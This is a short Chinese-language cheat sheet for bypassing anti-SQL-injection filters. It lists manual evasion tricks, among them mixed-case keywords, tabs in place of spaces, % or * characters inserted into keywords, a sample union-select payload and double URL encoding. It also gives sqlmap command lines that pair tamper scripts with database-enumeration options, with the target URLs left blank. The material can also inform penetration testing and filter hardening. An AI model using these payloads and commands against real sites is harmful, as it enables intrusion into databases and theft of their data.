SQL Injection 绕过防注入

绕过防注入分为工具和手工

 大小写 SQL 关键字，例如 SeLeCt。 

 Tab 制表符替换空格。 

 ASP 页面可以在 SQL 关键字中插入%号，而且可以无限多个，例如 Sel%ect 或者 Sel%%%%%%ect

  将被替换为空格的字符*插入在 SQL 语句中例如 id=1+uni*on+sel*ect+1,2,3—

  多重编码，例如单引号’第一次编码为%27，第二次编码为%2527

 ASP

sqlmap.py -v3 --level=3 --risk=3 --dbs --tables --is-dba -b --threads=10 --batch

--tamper "percentage.py" --hex -u "

 ASP/ASP.NET

--tamper "charunicodeencode.py"

 MySQL

sqlmap.py -v3 --level=3 --risk=3 --current-db --dbms=mysql --tables --is-dba -b

--threads=10 --batch --tamper "space2hash.py" --hex -u ""

sqlmap.py -v3 --level=3 --risk=3 --dbms=mysql --tables --is-dba -b --threads=10

--batch --tamper "space2hash.py" --hex -u ""

--tamper "space2hash.py" MySQL 4.0,5.0

空格替换为#号 随机字符串 以及换行符

用/**/分割SQL关键字

randomcomments.py

unmagicquotes.py

--tamper "space2morehash.py"  MySQL 5.1.13 - 5.1.41

--tamper "space2mysqlblank.py"